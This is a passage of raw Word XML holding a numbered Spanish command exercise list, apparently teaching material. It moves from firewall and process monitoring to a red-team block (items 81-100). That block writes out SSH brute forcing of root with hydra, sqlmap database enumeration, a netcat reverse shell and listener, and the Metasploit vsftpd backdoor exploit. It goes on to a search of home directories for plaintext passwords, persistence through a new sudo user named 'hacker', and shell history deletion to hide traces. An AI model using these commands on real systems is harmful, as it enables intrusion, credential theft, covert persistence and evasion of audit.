    <w:p w14:paraId="0F9EC67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67. Bloquear puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59316D5E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo ufw deny 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DA5AF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5B74DF45">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A120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68. Estado firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6350A5" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo ufw status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56198E33" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2DA63302">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71269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69. Monitorizar procesos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1AC64" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F741C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5BFF9E81">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="643632B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70. Alternativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44301C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>htop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F65A4A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="78709F57">
          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2CAF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71–80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660FF6E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fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0234046B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auditoría de logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A2E40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detección intrusos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED1BA0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permisos sospechosos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449B9D2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:t>rootkits básicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A67F6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="139DBCB4">
          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C230475" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 5: RED TEAM / PENTESTING (81–100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466EF045" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="255CEEAE">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="290452E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81. Escaneo completo objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECEE24" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -A -T4 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78917B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="793D3FE8">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571CA3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82. Enumeración web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967721A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nikto -h http://192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70912C47" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3DC9980C">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5CA206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83. Fuerza bruta SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C067F7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>hydra -l root -P rockyou.txt ssh://192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686159E0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="79DAEC6E">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1DCD5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84. SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D41DE41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sqlmap -u "http://site.com?id=1" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F8154B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5EAD43A0">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255A22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85. Escaneo subdominios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A39BB8F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>dnsenum dominio.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD392F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="38084125">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E782E9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86. Netcat reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495FF62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nc -e /bin/bash 192.168.1.5 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49732B2B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2FB7F120">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="624BDEE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87. Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B3D675" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75370E5B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3EAA1372">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EC0A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88. Explotación básica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2A45D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>(Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62882C65" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C09C4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1DB8C672">
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF6D55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89. Buscar exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00023A83" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B64E4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="54A1C892">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA6C9A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>90. Configurar exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B151541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use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5222B9D7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91. Enumerar usuarios en un sistema Linux comprometido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19405CFA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Tras acceder a una máquina, obtén la lista de usuarios del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B9D90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6B1886BC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F5C9F1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Este archivo contiene todos los usuarios del sistema. Es clave para saber posibles objetivos de escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50EEE7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="69FBBD6D">
          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9F147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92. Buscar archivos SUID (posible escalada de privilegios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA1712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Busca archivos con permisos SUID en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3E50E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0B6729EC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC0026D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Los archivos SUID se ejecutan con permisos de root → posible vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429D235" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="799EDC08">
          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6372277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93. Ver procesos ejecutándose como root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D604BB5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Identifica procesos que se ejecutan como root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62452BEE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12B326C0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ps aux | grep root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE24CB1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Algunos servicios mal configurados pueden ser explotables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5244D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5E6C0C26">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E7D81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94. Revisar tareas programadas (cron)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1AE7A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Busca tareas programadas que puedan ser vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F7ED3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4E512BE9" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>crontab -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E5985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Scripts ejecutados por root pueden ser modificables → escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D0EEC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="721B07B6">
          <v:rect id="_x0000_i1104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8231C7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95. Buscar archivos modificables por el usuario actual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC620E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Encuentra archivos que el usuario puede modificar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0A86DB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77E45C3E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>find / -writable 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3AAD1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Permite encontrar puntos débiles para inyectar código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DACC3CF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1203BF44">
          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E0924D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96. Escalada básica con sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D594CFE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Comprueba si puedes ejecutar comandos como root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EB8EE0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68D52913" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495A7ED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Si aparece algún comando permitido → posible escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5809C4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="34CD47C8">
          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B4F70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97. Enumeración automática con LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA34E1C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Ejecuta una herramienta automática de enumeración.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF85A85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7EB56BB1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>chmod +x linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F15B2B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explicación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Herramienta clave para detectar vulnerabilidades automáticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16432976" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="42478059">
          <v:rect id="_x0000_i1107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A471F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98. Buscar credenciales en archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA72D08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Busca posibles contraseñas en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E774B4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11906FB7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grep -r "password" /home 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A6F6F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Muchos sistemas almacenan credenciales en texto plano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31D8C1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4C13B51E">
          <v:rect id="_x0000_i1108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55553F73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99. Crear persistencia con usuario oculto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427008BA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Crea un usuario para mantener acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B9B43" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B50556B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo useradd hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>sudo passwd hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>sudo usermod -aG sudo hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9E248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Permite volver a entrar al sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9ABA07" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2B18111F">
          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF582B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100. Borrar rastros (limpieza básica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134610E3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Elimina evidencias de acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02028ED7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E79D4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>history -c</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>rm -rf ~/.bash_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D048031" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5555A834">
          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B69326" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Se eliminan registros de comandos ejecutados (aunque no siempre es suficiente → logs del sistema siguen existiendo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38105E1D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562"/>
    <w:sectPr w:rsidR="00206562" w:rsidRPr="002065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57698"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09D8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933C5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B864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4F45E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1E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900128"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="025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B1191C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="181AE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0F1159"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E4E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A771F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0858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292290">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1140922928">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2132630978">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1867525675">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1556888291">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="936446635">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="20562704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4F3"/>
    <w:rsid w:val="0000367A"/>
    <w:rsid w:val="000944F3"/>
    <w:rsid w:val="000B0C18"/>
    <w:rsid w:val="001840A6"/>
    <w:rsid w:val="00206562"/>
    <w:rsid w:val="002173EF"/>
    <w:rsid w:val="00261931"/>
    <w:rsid w:val="002E07CF"/>
    <w:rsid w:val="00312A5B"/>
    <w:rsid w:val="00364C15"/>
    <w:rsid w:val="00391104"/>
    <w:rsid w:val="003C13E1"/>
    <w:rsid w:val="00485AD7"/>
    <w:rsid w:val="00567500"/>
    <w:rsid w:val="005D1380"/>
    <w:rsid w:val="00653A7F"/>
    <w:rsid w:val="00681651"/>
    <w:rsid w:val="006C229C"/>
    <w:rsid w:val="007950B0"/>
    <w:rsid w:val="00830F46"/>
    <w:rsid w:val="00834E03"/>
    <w:rsid w:val="008E379E"/>
    <w:rsid w:val="00AF54CB"/>
    <w:rsid w:val="00AF589F"/>
    <w:rsid w:val="00B659DE"/>
    <w:rsid w:val="00C02B33"/>
    <w:rsid w:val="00C24203"/>
    <w:rsid w:val="00C4469D"/>
    <w:rsid w:val="00CB0846"/>
    <w:rsid w:val="00D36D92"/>
    <w:rsid w:val="00D6247B"/>
    <w:rsid w:val="00D63B9C"/>
